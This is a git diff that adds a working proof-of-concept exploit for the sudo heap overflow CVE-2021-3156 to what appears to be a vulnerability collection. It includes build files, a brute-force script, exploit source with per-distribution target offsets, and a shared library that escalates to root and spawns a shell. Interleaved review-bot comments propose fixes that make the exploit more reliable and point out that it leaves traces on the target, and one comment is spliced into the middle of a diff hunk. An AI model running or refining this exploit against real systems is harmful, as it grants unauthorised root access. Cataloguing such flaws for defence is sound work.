diff --git a/cve/sudo/2021/CVE-2021-3156/Makefile b/cve/sudo/2021/CVE-2021-3156/Makefile
new file mode 100644
index 0000000000000000000000000000000000000000..68ccbdd8026302c324f3ae8cbc98dc5de4f9ced5
--- /dev/null
+++ b/cve/sudo/2021/CVE-2021-3156/Makefile
@@ -0,0 +1,9 @@
+all:
+ rm -rf libnss_X
+ mkdir libnss_X
+ gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
+ gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
+brute: all
+ gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
+clean:
+ rm -rf libnss_X sudo-hax-me-a-sandwich
diff --git a/cve/sudo/2021/CVE-2021-3156/README.md b/cve/sudo/2021/CVE-2021-3156/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..06c694826fd6338f155d0cf389c6683a81b7f493
--- /dev/null
+++ b/cve/sudo/2021/CVE-2021-3156/README.md
@@ -0,0 +1,57 @@
+# CVE-2021-3156 PoC
+
+## Introduction
+
+This is an exploit for the `CVE-2021-3156` sudo vulnerability (dubbed [Baron Samedit](https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt) by Qualys).
+
+## Usage
+
+build:
+```
+$ make
+```
+
+
+list targets:
+```
+$ ./sudo-hax-me-a-sandwich
+```
+
+run:
+```
+$ ./sudo-hax-me-a-sandwich
+```
+
+manual mode:
+```
+$ ./sudo-hax-me-a-sandwich
+```
+
+## Bruteforce target finding (experimental)
+
+Make sure you have [GNU parallel](https://ftpmirror.gnu.org/parallel/parallel-latest.tar.bz2) installed.
+
+```
+$ make brute
+$ ./brute.sh
+```
+
+some defaults to try:
+```
+$ ./brute.sh 90 120 50 70 150 300
+```
+
+Will eat up all available cores. Don't try to netflix & brute.
+
+## Contributing
+
+Send (sensible) PR's, I might merge.
+
+Some ideas:
+* More targets
+* Target finding
+* Other exploitation strategies
+* More self contained functionality:
+ * Embed shared library hax.c (Make it small please, ELF golf + asm setuid/execve stub)
+ * Add mkdir logic to hax.c
+* Directory/shared library cleanup
diff --git a/cve/sudo/2021/CVE-2021-3156/brute.sh b/cve/sudo/2021/CVE-2021-3156/brute.sh
new file mode 100755
index 0000000000000000000000000000000000000000..7bfff08c9577cfd750c7ec8718eecd46d460d123
--- /dev/null
+++ b/cve/sudo/2021/CVE-2021-3156/brute.sh
@@ -0,0 +1,90 @@
+#!/bin/bash
+
+try_brute() {
+ IDX=`echo "$1" | awk -F ':' '{ print $1 }'`
+ ALEN=`echo "$1" | awk -F ':' '{ print $2 }'`
+ BLEN=`echo "$1" | awk -F ':' '{ print $3 }'`
+ NLEN=`echo "$1" | awk -F ':' '{ print $4 }'`
+ LCLEN=`echo "$1" | awk -F ':' '{ print $5 }'`
+ OFN=out/`printf "%08d" $IDX`.txt
+
+ (
+ timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1
+ ) > $OFN
+
+ R="`grep -B999 bl1ng $OFN`"
+
+ if [ "$R" == "" ]; then
+ echo "NOPE"
+ else
+ echo "==================" >> success.txt
+ grep -B999 bl1ng $OFN >> success.txt
+ fi
+
+ rm -f "${OFN}"
+}
+
+if [ "$#" == "1" ]; then
+ N=`echo "$1" | awk -F ':' '{ print NF }'`
+ if [ "$N" == 5 ]; then
+ try_brute "$1"
+ exit 0
+ fi
+fi
+
+if [ "$#" != "6" ]; then
+ echo "usage: $0 "
+ exit 0
+fi
+
+if ! [ -x "$(command -v parallel)" ]; then
+ echo "error: gnu parallel not found"
+ exit 1
+fi
+
+smash_min=$1
+smash_max=$2
+null_min=$3
+null_max=$4
+lc_min=$5
+lc_max=$6
+
+echo "[+] cleaning up.."
+rm -rf possib
+rm -rf success.txt
+touch success.txt
+mkdir out 2>/dev/null
+# people are likely to forget this
+make brute 2>/dev/null
+
+# generate permutations
+echo "[+] generating possibilities.."
+i=0
+for smash_len in `seq $smash_min $smash_max`; do
+for null_stomp_len in `seq $null_min $null_max`; do
+for lc_all_len in `seq $lc_min 10 $lc_max`; do
+ if [ "$[$smash_len % 2]" == "1" ]; then
+ alen=$[($smash_len-1)/2]
+ blen=$[$alen + 1]
+ else
+ alen=$[$smash_len/2]
+ blen=$alen
+ fi
+
+ echo "$i:${alen}:${blen}:${null_stomp_len}:${lc_all_len}" >> possib
+ i=$[$i+1]
+done
+done
+done
+
+# start bruting
+echo "[+] lets go.."
+parallel -j +`nproc` --eta $0 < possib
+
+echo "[+] done"
+if [ "`cat success.txt|wc -l`" == "0" ]; then
+ echo "[-] we didnt find any working candidates :("
+else
+ echo "[+] we found some goodies (saved in success.txt):"
+ cat success.txt
+fi
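Review bot: `make brute 2>/dev/null` in the setup section discards both the compiler diagnostics and the exit status, so if `hax.c` or `lib.c` fails to build the loop still runs every candidate against a missing or stale `sudo-hax-me-a-sandwich`/`libnss_X` and the script ends with "we didnt find any working candidates" instead of a build error; `make brute >/dev/null 2>&1 || { echo "error: build failed"; exit 1; }` stops early. The usage branch (`if [ "$#" != "6" ]`) exits 0 on a wrong argument count while the missing-`parallel` branch exits 1 — `exit 1` there keeps wrappers from treating a misinvocation as success. A comment above the `parallel` line is also worth adding: every candidate in `possib` is a separate `sudoedit` invocation via `timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich ...`, which sudo presumably records in the system auth log (and a crashing setuid binary may leave core dumps), so a run over ranges like the README's defaults is anything but quiet on the target.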
diff --git a/cve/sudo/2021/CVE-2021-3156/hax.c b/cve/sudo/2021/CVE-2021-3156/hax.c
new file mode 100644
index 0000000000000000000000000000000000000000..dd33fa20a2ad04cb10c3de3910d392284a114e8c
--- /dev/null
+++ b/cve/sudo/2021/CVE-2021-3156/hax.c
@@ -0,0 +1,158 @@
+/**
+ ** CVE-2021-3156 PoC by blasty
+ ** ===========================================
+ **
+ ** Exploit for that sudo heap overflow thing everyone is talking about.
+ ** This one aims for singleshot. Does not fuck with your system files.
+ ** No warranties.
+ **
+ ** Shout outs to:
+ ** Qualys - for pumping out the awesome bugs
+ ** lockedbyte - for coop hax. (shared tmux gdb sessions ftw)
+ ** dsc - for letting me rack up his electricity bill
+ ** my wife - for all the quality time we had to skip
+ **
+ ** Enjoy!
+ **
+ ** -- blasty // 20210130
+ **/
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+// 512 environment variables should be enough for everyone
+#define MAX_ENVP 512
+#define SUDOEDIT_PATH "/usr/bin/sudoedit"
+
+typedef struct {
+ char *target_name;
+ char *sudoedit_path;
+ uint32_t smash_len_a;
+ uint32_t smash_len_b;
+ uint32_t null_stomp_len;
+ uint32_t lc_all_len;
+} target_t;
+
+target_t targets[] = {
+ {
+ // Yes, same values as 20.04.1, but also confirmed.
+ .target_name = "Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27",
+ .sudoedit_path = SUDOEDIT_PATH,
+ .smash_len_a = 56,
+ .smash_len_b = 54,
+ .null_stomp_len = 63,
+ .lc_all_len = 212
+ },
+ {
+ .target_name = "Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31",
+ .sudoedit_path = SUDOEDIT_PATH,
+ .smash_len_a = 56,
+ .smash_len_b = 54,
+ .null_stomp_len = 63,
+ .lc_all_len = 212
+ },
+ {
+ .target_name = "Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28",
+ .sudoedit_path = SUDOEDIT_PATH,
+ .smash_len_a = 64,
+ .smash_len_b = 49,
+ .null_stomp_len = 60,
+ .lc_all_len = 214
+ }
+};
+
+void usage(char *prog) {
+ fprintf(stdout,
+ " usage: %s \n\n"
+ " available targets:\n"
+ " ------------------------------------------------------------\n",
+ prog
+ );
+ for(int i = 0; i < sizeof(targets) / sizeof(target_t); i++) {
+ printf(" %d) %s\n", i, targets[i].target_name);
+ }
+ fprintf(stdout,
+ " ------------------------------------------------------------\n"
+ "\n"
+ " manual mode:\n"
+ " %s \n"
+ "\n",
+ prog
+ );
+}
+
+int main(int argc, char *argv[]) {
+ printf("\n** CVE-2021-3156 PoC by blasty \n\n");
+
+ if (argc != 2 && argc != 5) {
+ usage(argv[0]);
+ return -1;
+ }
+
+ target_t *target = NULL;
+ if (argc == 2) {
+ int target_idx = atoi(argv[1]);
+
+ if (target_idx < 0 || target_idx >= (sizeof(targets) / sizeof(target_t))) {
+ fprintf(stderr, "invalid target index\n");
+ return -1;
+ }
+
+ target = &targets[ target_idx ];
+ } else {
+ target = malloc(sizeof(target_t));
+ target->target_name = "Manual";
+ target->sudoedit_path = SUDOEDIT_PATH;
+ target->smash_len_a = atoi(argv[1]);
+ target->smash_len_b = atoi(argv[2]);
+ target->null_stomp_len = atoi(argv[3]);
+ target->lc_all_len = atoi(argv[4]);
+ }
+
+ printf(
+ "using target: %s ['%s'] (%d, %d, %d, %d)\n",
+ target->target_name,
+ target->sudoedit_path,
+ target->smash_len_a,
+ target->smash_len_b,
+ target->null_stomp_len,
+ target->lc_all_len
+ );
+
+ char *smash_a = calloc(target->smash_len_a + 2, 1);
+ char *smash_b = calloc(target->smash_len_b + 2, 1);
+
+ memset(smash_a, 'A', target->smash_len_a);
+ memset(smash_b, 'B', target->smash_len_b);
+
+ smash_a[target->smash_len_a] = '\\';
+ smash_b[target->smash_len_b] = '\\';
+
+ char *s_argv[]={
+ "sudoedit", "-s", smash_a, "\\", smash_b, NULL
+ };
+
+ char *s_envp[MAX_ENVP];
+ int envp_pos = 0;
+
+ for(int i = 0; i < target->null_stomp_len; i++) {
+ s_envp[envp_pos++] = "\\";
+ }
+ s_envp[envp_pos++] = "X/P0P_SH3LLZ_";
+
+ char *lc_all = calloc(target->lc_all_len + 16, 1);
+ strcpy(lc_all, "LC_ALL=C.UTF-8@");
+ memset(lc_all+15, 'C', target->lc_all_len);
+
+ s_envp[envp_pos++] = lc_all;
+ s_envp[envp_pos++] = NULL;
+
+ printf("** pray for your rootshell.. **\n");
+
+ execve(target->sudoedit_path, s_argv, s_envp);
+ return 0;
+}
diff --git a/cve/sudo/2021/CVE-2021-3156/lib.c b/cve/sudo/2021/CVE-2021-3156/lib.c
new file mode 100644
index 0000000000000000000000000000000000000000..e999b3b3ec65a2d6bbb7400c4a03993f4cbd9f55
--- /dev/null
+++ b/cve/sudo/2021/CVE-2021-3156/lib.c
@@ -0,0 +1,16 @@
+#include
+#include
+#include
+#include
+
+static void __attribute__ ((constructor)) _init(void);
+
+static void _init(void) {
+ printf("[+] bl1ng bl1ng! We got it!\n");
+#ifndef BRUTE
+ setuid(0); seteuid(0); setgid(0); setegid(0);
+ static char *a_argv[] = { "sh", NULL };
+ static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
+ execv("/bin/sh", a_argv);
+#endif
+}
diff --git a/cve/sudo/2021/yaml/CVE-2021-3156.yaml b/cve/sudo/2021/yaml/CVE-2021-3156.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..d99375223a23ba8b61d5bb0aa876fc3b136bb8d5
--- /dev/null
+++ b/cve/sudo/2021/yaml/CVE-2021-3156.yaml
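Review bot: In manual mode `target->null_stomp_len = atoi(argv[3])` feeds the `for(int i = 0; i < target->null_stomp_len; i++) s_envp[envp_pos++] = "\\";` loop with no upper bound, yet `s_envp` has only `MAX_ENVP` (512) slots and three more entries are stored after the loop, so any value above 509 overruns the exploit's own stack array (and a negative `atoi` result becomes a huge `uint32_t`). A guard after the argument parsing, `if (target->null_stomp_len > MAX_ENVP - 3) { fprintf(stderr, "null_stomp_len too large\n"); return -1; }`, keeps the harness itself well-defined, and `strtoul` with an end-pointer check would also reject the non-numeric input that `atoi` silently maps to 0. The `execve(target->sudoedit_path, s_argv, s_envp);` call has no failure path — if the binary is absent or not executable, `main` falls through to `return 0` and the operator sees only the banner — so `perror("execve"); return 1;` after it would distinguish "sudoedit not found" from a failed overflow (brute.sh's grep otherwise scores both as a plain miss). The `%d` conversions in the `using target:` printf are paired with `uint32_t` fields, where `%u` (or `PRIu32`) matches the type, and the `malloc(sizeof(target_t))` result is dereferenced unchecked.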
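Review bot: `a_envp` is defined inside the `#ifndef BRUTE` block but never used — the constructor calls `execv("/bin/sh", a_argv)`, so the shell inherits whatever environment the hosting sudo process has at that moment (presumably still the run of `\` variables and the oversized `LC_ALL` planted by hax.c) instead of the clean `PATH=/bin:/usr/bin:/sbin` the array was evidently meant to supply. `execve("/bin/sh", a_argv, a_envp);` uses it as intended and should also clear the unused-variable warning under `-Wall`. The `setuid(0); seteuid(0); setgid(0); setegid(0);` results are discarded and the shell is spawned regardless, so checking at least the first — `if (setuid(0) != 0) { perror("setuid"); return; }` — tells the operator why a shell came back without root instead of leaving it to be diagnosed with `id`. If `execv` itself fails the constructor simply returns into sudo's corrupted heap state; a `perror("execv");` before `#endif` costs one line.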
@@ -0,0 +1,20 @@
+id: CVE-2021-3156
+source: https://github.com/blasty/CVE-2021-3156
+info:
+ name: Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。
+ severity: high
+ description: |
+ Sudo before 1.9.5p2 存在缓冲区错误漏洞,攻击者可使用sudoedit -s和一个以单个反斜杠字符结束的命令行参数升级到root。
+ scope-of-influence:
+ 小于1.9.5p2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-3156
+ - http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2021-3156
+ cwe-id: CWE-193
+ cnvd-id: None
+ kve-id: None
+ tags: 堆缓冲区溢出漏洞,cve2021,权限提升
\ No newline at end of file
diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml
index c230e28e3d30bcbf7cb7e84abd23bcb477c3d006..e18965ad3edbf4bbf4ef9cd4fa28f01aa807fd03 100644
--- a/vulnerability_list.yaml
+++ b/vulnerability_list.yaml
@@ -10,5 +10,7 @@ cve:
 - CVE-2022-0185
 - CVE-2022-24122
 - CVE-2022-0492
+ sudo:
+ - CVE-2021-3156
 cnvd:
 kve:
\ No newline at end of file
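Review bot: The `name:` field holds a one-sentence description of what sudo is rather than a name for the vulnerability, so anything that renders `info.name` as a title will show a product blurb; a title such as `name: Sudo heap-based buffer overflow (Baron Samedit)` (or its Chinese equivalent) fits the field, with the current sentence moved into `description`. `scope-of-influence: 小于1.9.5p2` ("below 1.9.5p2") overstates the affected range: the upstream sudo and Qualys advisories list legacy 1.8.2–1.8.31p2 and stable 1.9.0–1.9.5p1, so stating both bounds (`1.8.2 - 1.8.31p2, 1.9.0 - 1.9.5p1`) avoids flagging older releases that are not vulnerable, and a note that distribution backports keep an affected-looking version string would help anyone matching on version alone. The `description` also mixes English (`Sudo before 1.9.5p2`) with Chinese; one language per record keeps the corpus consistent.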